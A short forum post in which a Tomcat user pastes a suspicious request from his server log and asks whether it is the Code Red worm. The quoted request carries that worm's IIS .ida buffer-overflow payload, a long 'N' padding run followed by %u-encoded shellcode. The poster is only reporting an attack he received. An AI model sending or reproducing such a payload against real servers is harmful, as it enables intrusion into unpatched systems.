Just a question, as I am not too computer savvy, I have had Tomcat up and running for about 20 min now for a site I am working on locally, and I just saw this request come in: Full GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u 6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190 %u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0 Content-type: text/xmlHOST:www.worm.com Accept: */* Is this that Code Red worm? If yes, amazing, having my server up for such a short time and not serving a "real web site" and already getting hit. Erick